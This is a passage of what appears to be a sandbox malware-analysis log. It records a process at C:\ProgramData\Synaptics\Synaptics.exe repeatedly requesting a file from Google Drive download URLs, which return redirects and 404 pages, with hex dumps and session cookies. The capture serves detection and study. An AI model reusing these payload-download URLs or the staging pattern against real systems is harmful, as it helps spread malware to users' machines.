                                                                                                                                                      2024-12-30 10:25:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 45 6d 63 79 73 2d 50 76 44 6c 76 35 45 49 57 33 76 73 5a 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="0Emcys-PvDlv5EIW3vsZrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      57192.168.2.1149967172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XH0uVXpPQHQZlv6TFLzAHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      58192.168.2.1149976142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7sJu-SL0N5mzEfzGbZXJbejdKpavIyM1v9v6QTaSeygv_ktc1Y-Pz3ggFkoxrcXd6v
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xXB9wz8cNx2a8xNRmRL6KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 6d 4b 79 53 46 5f 7a 68 72 52 34 68 52 43 79 35 49 70 69 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="8mKySF_zhrR4hRCy5Ipi1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      59192.168.2.1149977172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:47 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                                                                                                                                                      2024-12-30 10:25:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LefobZROHepsQf2ROX5G6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      60192.168.2.1149983172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:47 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ec1S7Z-hwGEjyR3wCj4dKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      61192.168.2.1149984142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:48 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5pQD3No1ypbTfx7PvASXBqIbdAH8d5K0uu7YQQQ2LHk8OKa2Ul4vKBWW4m4fpNUX15q4T5EJQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5bylDbVJyegCWBl8Fetrhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:48 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:48 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 38 48 76 6f 42 4c 66 71 4a 75 50 68 77 72 62 45 69 68 74 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="p8HvoBLfqJuPhwrbEihtfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:48 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      62192.168.2.1149992142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:48 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5Xtnm1YVCBj1g6Lk_Trfvx1Bsit2YY-n8hnozM9gK6ZXBYGAyJLtHlxkJeXKgP2i3-8isZXcs
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JkAS7PjkOkv0bfdkwH9hyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 6f 77 76 67 6e 43 4d 48 6d 7a 39 77 59 73 45 63 49 79 2d 7a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="_owvgnCMHmz9wYsEcIy-zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      63192.168.2.1149991172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:48 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
